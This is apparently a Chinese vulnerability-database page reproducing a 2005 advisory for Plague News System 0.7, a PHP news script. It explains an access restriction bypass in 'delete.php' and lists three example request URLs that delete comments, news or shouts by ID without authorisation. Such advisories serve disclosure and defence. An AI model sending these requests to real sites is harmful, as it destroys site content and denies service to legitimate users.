Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass

17次阅读
没有评论

Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass

漏洞ID 1055215 漏洞类型
发布时间 2005-07-04 更新时间 2005-07-04
Plague News System 0.7 - 'delete.php' Access Restriction BypassCVE编号 N/A
Plague News System 0.7 - 'delete.php' Access Restriction BypassCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25937
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14139/info

Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script.

A remote attacker may exploit this issue to delete site content and deny service for legitimate users. 

http://www.example.com/delete.php?comment=1&id=[ID of comment here]
http://www.example.com/delete.php?news=1&id=[ID of news here]
http://www.example.com/delete.php?shout=1&id=[ID of shout here]

相关推荐: iGeneric Shop 多参数SQL注入漏洞

iGeneric Shop 多参数SQL注入漏洞 漏洞ID 1200111 漏洞类型 SQL注入 发布时间 2005-02-21 更新时间 2005-02-21 CVE编号 CVE-2005-0537 CNNVD-ID CNNVD-200502-074 漏洞平…

正文完
 0